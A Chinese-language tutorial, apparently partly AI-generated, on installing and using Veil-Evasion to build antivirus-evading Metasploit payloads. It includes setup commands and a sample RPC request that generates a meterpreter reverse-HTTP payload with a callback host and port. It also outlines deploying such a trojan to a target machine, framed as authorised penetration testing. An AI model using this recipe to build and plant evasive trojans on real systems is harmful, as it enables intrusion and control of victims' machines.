Veil-Evasion 使用教程
Veil-Evasion 项目地址: https://gitcode.com/gh_mirrors/veil/Veil
1. 项目介绍
Veil-Evasion 是一个开源工具,旨在生成能够绕过常见防病毒解决方案的 Metasploit 负载。该工具主要由 @ChrisTruncer、@TheMightyShiv 和 @HarmJ0y 维护,并得到了开源社区的广泛贡献。Veil-Evasion 设计用于在 Kali Linux 上运行,但也适用于任何能够执行 Python 脚本的其他系统。
2. 项目快速启动
环境准备
- Linux 系统建议使用 Kali Linux,因为它预装了所有依赖。
- 如果不使用 Kali Linux,需要安装 Python 2.7、PyCrypto (>= 2.3)。
对于 Windows 系统,需要安装:
- Python 2.7
- Py2Exe
- PyCrypto
- PyWin32
安装步骤
-
克隆项目到本地:
git clone https://github.com/Veil-Framework/Veil-Evasion.git
-
切换到项目目录并运行安装脚本:
cd Veil-Evasion/ ./setup/setup.sh -c
-
如果需要重新生成配置文件,确保在
config/
目录下运行update.py
。
启动 RPC 服务器
在监听端运行以下命令启动 RPC 服务器:
./Veil-Evasion --rpc
生成负载
使用 Netcat 或其他工具向 RPC 服务器发送请求以生成负载。以下是一个示例请求:
nc 127.0.0.1 4242
{"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1}
服务器响应将包含生成的可执行文件路径。
3. 应用案例和最佳实践
-
案例一:生成一个绕过防病毒软件的木马,用于渗透测试。
- 选择合适的负载,如
c/meterpreter/rev_http
。 - 设置监听主机和端口。
- 生成负载,并编译为可执行文件。
- 将可执行文件部署到目标机器。
- 选择合适的负载,如
-
最佳实践:在使用之前,请确保理解相关法律和道德规范,仅在授权的环境中进行测试。
4. 典型生态项目
Veil-Evasion 作为一款专注于绕过防病毒软件的工具,是渗透测试领域的一个组成部分。以下是与 Veil-Evasion 相关的一些典型生态项目:
- Metasploit Framework:一款流行的渗透测试框架,可以与 Veil-Evasion 生成负载配合使用。
- BeEF (Browser Exploitation Framework):一个专注于网页浏览器的渗透测试框架。
- ExploitDB:一个漏洞利用代码的数据库,可以查找与 Veil-Evasion 相兼容的利用代码。
通过结合这些工具,安全专家可以更全面地进行安全评估和渗透测试。
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考